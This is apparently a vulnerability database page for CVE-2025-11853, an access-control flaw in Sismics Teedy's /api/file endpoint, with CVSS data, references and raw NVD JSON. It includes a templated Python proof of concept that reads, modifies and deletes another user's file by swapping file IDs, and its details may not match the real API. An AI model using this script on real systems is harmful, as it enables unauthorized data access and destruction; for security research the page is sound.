CVE-2025-11853

Description

A vulnerability was determined in Sismics Teedy up to 1.11. This affects an unknown function of the file /api/file of the component API Endpoint. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:sismics:teedy:*:*:*:*:*:*:*:* - VULNERABLE

Sismics Teedy <= 1.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11853 PoC - Sismics Teedy Improper Access Control
# Target: /api/file endpoint in Sismics Teedy <= 1.11
# Description: Exploits improper access controls in the API file endpoint

import requests

# Target configuration
TARGET_URL = "http://target-teedy-instance.com"
API_ENDPOINT = "/api/file"

# Attacker credentials (low-privilege account)
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Authenticate to obtain session token
session = requests.Session()
login_url = f"{TARGET_URL}/api/user/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

response = session.post(login_url, json=login_data)
if response.status_code == 200:
    token = response.json().get("token")
    print(f"[+] Authentication successful, token obtained")
else:
    print("[-] Authentication failed")
    exit(1)

# Step 2: Exploit improper access control on /api/file
# Attempt to access/modify files without proper authorization
headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json"
}

# Example: Access another user's file by manipulating the file ID
target_file_id = "TARGET_FILE_ID_HERE"
exploit_url = f"{TARGET_URL}{API_ENDPOINT}/{target_file_id}"

# Attempt unauthorized file access
response = session.get(exploit_url, headers=headers)
if response.status_code == 200:
    print(f"[+] Unauthorized access successful!")
    print(f"[+] File data: {response.text}")
else:
    print(f"[-] Access denied, status code: {response.status_code}")

# Example: Attempt unauthorized file modification
modify_data = {
    "title": "Modified Title",
    "description": "Unauthorized modification"
}
response = session.put(exploit_url, headers=headers, json=modify_data)
if response.status_code == 200:
    print(f"[+] Unauthorized modification successful!")

# Example: Attempt unauthorized file deletion
response = session.delete(exploit_url, headers=headers)
if response.status_code == 200:
    print(f"[+] Unauthorized deletion successful!")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11853
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11853
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11853/
[4] VulDB https://vuldb.com/cve/CVE-2025-11853
[5] https://docs.google.com/document/d/1PzTPCtavuLx_GwREvshGMQ8N5zFDmpe-OAR5kZwOZfE/edit?usp=sharing
[6] https://vuldb.com/?ctiid.328799
[7] https://vuldb.com/?id.328799
[8] https://vuldb.com/?submit.657060

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11853", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:32.420", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Sismics Teedy up to 1.11. This affects an unknown function of the file /api/file of the component API Endpoint. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sismics:teedy:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.11", "matchCriteriaId": "10C041A4-4B9D-4A64-A199-C99E219CF0A2"}]}]}], "references": [{"url": "https://docs.google.com/document/d/1PzTPCtavuLx_GwREvshGMQ8N5zFDmpe-OAR5kZwOZfE/edit?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328799", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328799", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.657060", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}